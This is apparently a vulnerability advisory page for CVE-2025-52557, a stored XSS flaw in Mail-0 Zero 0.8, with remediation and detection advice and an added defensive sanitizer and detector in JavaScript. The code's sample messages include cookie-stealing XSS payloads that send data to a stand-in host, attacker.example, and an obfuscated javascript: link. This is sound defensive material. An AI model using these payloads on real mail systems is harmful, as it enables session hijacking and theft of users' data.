CVE-2025-52557

EUVD-2025-18797 | HIGH
Published 2025-06-21
CVSS 4.0 base score: 8.6

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: None
User Interaction: Passive (UI:P)
Vulnerable System Impact: Confidentiality High, Integrity High, Availability None
Subsequent System Impact: None

Lifecycle Timeline

Analysis Generated: Mar 15, 2026 21:35 (vuln.today)
EUVD ID Assigned: Mar 15, 2026 21:35 (euvd) as EUVD-2025-18797
CVE Published: Jun 21, 2025 02:15 (nvd)

Description

Mail-0's Zero is an open-source email solution. In version 0.8 it's possible for an attacker to craft an email that executes javascript leading to session hijacking due to improper sanitization. This issue has been patched in version 0.81.

Analysis

CVE-2025-52557 is a stored cross-site scripting (XSS) vulnerability in Mail-0's Zero email solution, version 0.8. The attacker needs no account on the Zero instance: sending a crafted email whose HTML body carries JavaScript is enough. When a user views that message in the web interface, the script runs in the user's browser under the origin of the Zero web application, which enables session hijacking and potential account takeover. The only user interaction required is opening the message (CVSS 4.0 UI:P), which is why the vector still scores 8.6 (High). The issue is patched in version 0.81; upgrading is the fix, and it should be applied promptly.

Technical Context

Mail-0 Zero is an open-source email solution that fetches messages and renders them in a web interface. The weakness is the classic cross-site scripting pattern (CWE-79, improper neutralization of input during web page generation): HTML email bodies are inserted into the browser DOM without adequate sanitization, so the parsing/rendering pipeline fails to strip or neutralize dangerous markup such as <script> elements, inline event handler attributes (onclick, onerror, onload), and javascript: URLs in href or src attributes.

Because the message is rendered inside the authenticated user's session, the injected script runs with that session's privileges: it can read any token that is accessible to script, call the application's own API as the victim, and exfiltrate message contents. One caveat when assessing impact: an HttpOnly session cookie cannot be read by script, but it is still sent automatically with requests the script makes, so "session hijacking" here may mean acting as the victim from inside the victim's browser rather than stealing the cookie itself.

CPE identification would be: cpe:2.3:a:mail-0:zero:0.8:*:*:*:*:*:*:*

Affected Products

- Vendor: Mail-0
- Product: Zero
- Affected version: 0.8
- Patched version: 0.81
- CPE: cpe:2.3:a:mail-0:zero:0.8:*:*:*:*:*:*:*
- Component: email message rendering engine / web UI
- Deployment scope: open-source email solution; affects self-hosted and cloud deployments running the affected version

Remediation

Upgrade Mail-0 Zero from version 0.8 to version 0.81 or later. Priority: IMMEDIATE.
- Review the Mail-0 Zero release notes and changelog for version 0.81 and later.
- Test the upgrade in a non-production environment.
- Deploy it to every instance running version 0.8.
- Verify the upgrade and confirm that HTML email rendering still works as expected.

Workaround (temporary, until the patch is applied): disable or restrict access to the web UI.
- Configure the reverse proxy (nginx/Apache) to allow web UI access from trusted IP ranges only.
- Where the mail provider behind the deployment exposes it, have users read mail through an alternative client (IMAP/POP3) instead of the web interface.
- Send a Content-Security-Policy header whose script-src omits 'unsafe-inline' (defense in depth). Browsers then refuse inline <script> blocks, inline event handlers and javascript: URLs, which removes the easiest payloads; a CSP does not, however, fix the missing sanitization itself.

Detection and monitoring: watch for exploitation attempts.
- Scan stored message bodies (or inbound mail at the MTA or mail filter) for <script> elements, inline on* event handler attributes and javascript: URLs.
- Watch session logs for anomalies such as an existing session suddenly being used from an unexpected IP address or user agent.
- Add WAF/IDS rules that flag XSS payloads in email headers and bodies.
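The rendering weakness described under Technical Context and the message-scanning step above, as one added example that is not part of this advisory or of the Mail-0/Zero code base: an allowlist-based sanitizer for HTML email bodies (the kind of control version 0.8 lacked) next to a detector that flags the same constructs in stored mail. The tag and attribute allowlists, the function names and the sample messages are assumptions made for illustration; it uses only the Node.js standard library.

```javascript
// Added example, not Mail-0/Zero project code: an allowlist sanitizer for
// HTML email bodies (the control version 0.8 lacked) plus a detector that
// flags the same constructs in stored messages. Node.js stdlib only. The
// allowlists are assumptions for illustration; production code should use a
// maintained sanitizer such as DOMPurify instead of hand-rolled parsing.
const ALLOWED_TAGS = new Set(["p", "br", "b", "i", "u", "em", "strong", "a", "img",
  "div", "span", "ul", "ol", "li", "blockquote", "table", "tr", "td", "th"]);
// Per-tag attribute allowlist; on* handlers, style, srcdoc... are dropped by omission.
const ALLOWED_ATTRS = { a: ["href", "title"], img: ["src", "alt", "width", "height"] };
const VOID_TAGS = new Set(["br", "img"]);
const SAFE_SCHEME = /^(?:https?|mailto):/i;
const NAMED_ENTITIES = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
const ATTR_RE = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
const TAG_RE = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/;

// Decode numeric and common named entities. The semicolon is optional because
// browsers tolerate "&#x09" without it; not decoding would miss "java&#x09;script:".
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|(amp|lt|gt|quot|apos));?/gi, (_, hex, dec, name) => {
    if (name) return NAMED_ENTITIES[name.toLowerCase()];
    const cp = parseInt(hex ?? dec, hex ? 16 : 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
  });
}

// Normalized URL if its scheme is allowed, else null. Whitespace and control
// characters are stripped first: browsers ignore them, so "java\tscript:" runs.
function safeUrl(value) {
  const cleaned = value.replace(/[\u0000-\u0020]/g, "");
  return SAFE_SCHEME.test(cleaned) ? cleaned : null;
}
const escapeText = (s) => s.replace(/</g, "&lt;").replace(/>/g, "&gt;");
const escapeAttr = (s) => s.replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;").replace(/>/g, "&gt;");

// Re-serialize only allowlisted attributes; href/src get the scheme check.
function serializeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag] || [];
  let out = "";
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    if (!allowed.includes(name)) continue;
    let value = decodeEntities(m[2] ?? m[3] ?? m[4] ?? "");
    if (name === "href" || name === "src") value = safeUrl(value);
    if (value !== null) out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

// Tokenize and rebuild from allowlisted tags only. Nothing is copied through
// raw: "<" outside an allowed tag is escaped (comments and doctypes included),
// unknown tags are dropped (their text kept) and <script>/<style> are removed
// together with their content.
function sanitizeEmailHtml(html) {
  let out = "", i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { out += escapeText(html.slice(i)); break; }
    out += escapeText(html.slice(i, lt));
    const m = TAG_RE.exec(html.slice(lt));
    if (!m) { out += "&lt;"; i = lt + 1; continue; }    // stray "<" becomes text
    const [whole, closing, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    if (name === "script" || name === "style") {
      if (closing) continue;
      const cm = new RegExp(`</${name}\\s*>`, "i").exec(html.slice(i));
      i = cm ? i + cm.index + cm[0].length : html.length;
    } else if (ALLOWED_TAGS.has(name) && closing) {
      if (!VOID_TAGS.has(name)) out += `</${name}>`;
    } else if (ALLOWED_TAGS.has(name)) {
      out += `<${name}${serializeAttrs(name, rawAttrs)}>`;
    }
  }
  return out;
}

// Detection side: XSS indicator labels present in a body. Tuned for recall, so
// a message merely quoting "&lt;script&gt;" is flagged too; review, don't block blindly.
function findXssIndicators(html) {
  const decoded = decodeEntities(html);
  const compact = decoded.replace(/[\u0000-\u0020]/g, "");   // defeats "java\tscript:"
  const hits = [];
  if (/<script\b/i.test(decoded)) hits.push("script tag");
  if (/<[a-z][^>]*\son[a-z]+\s*=/i.test(decoded)) hits.push("inline event handler");
  if (/(?:href|src|action|formaction)=["']?(?:javascript|vbscript):/i.test(compact)) hits.push("script-scheme URL");
  if (/<(?:iframe|object|embed|svg|math|form)\b/i.test(decoded)) hits.push("active-content element");
  return hits;
}

// Constructed sample messages for the demonstration (not captured mail).
const SAMPLES = {
  benign: '<p>Hi team,</p><p>Notes are at <a href="https://example.com/notes?a=1&amp;b=2">the wiki</a>.</p>',
  scriptTag: '<p>Invoice attached</p><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  eventHandler: '<img src="x" onerror="new Image().src=\'https://attacker.example/?c=\' + document.cookie">',
  jsUrl: '<a href="java&#x09;script:alert(document.cookie)">View invoice</a>',
};
for (const [label, body] of Object.entries(SAMPLES))
  console.log(`${label}: indicators=${JSON.stringify(findXssIndicators(body))} sanitized=${sanitizeEmailHtml(body)}`);
```

The design point is that the sanitizer never copies attacker markup through: it reconstructs allowed tags from parsed names and filtered, re-escaped attribute values, so a tag that confuses the tokenizer (for example `<scr<script>ipt>`) degrades to escaped text rather than to a live element. The detector deliberately decodes entities and strips control characters before matching, because those are the two cheapest ways to slip `javascript:` past a naive grep of the raw body.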

Priority Score

43 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.1
CVSS: +43
POC: 0


CVE-2025-52557 vulnerability details – vuln.today
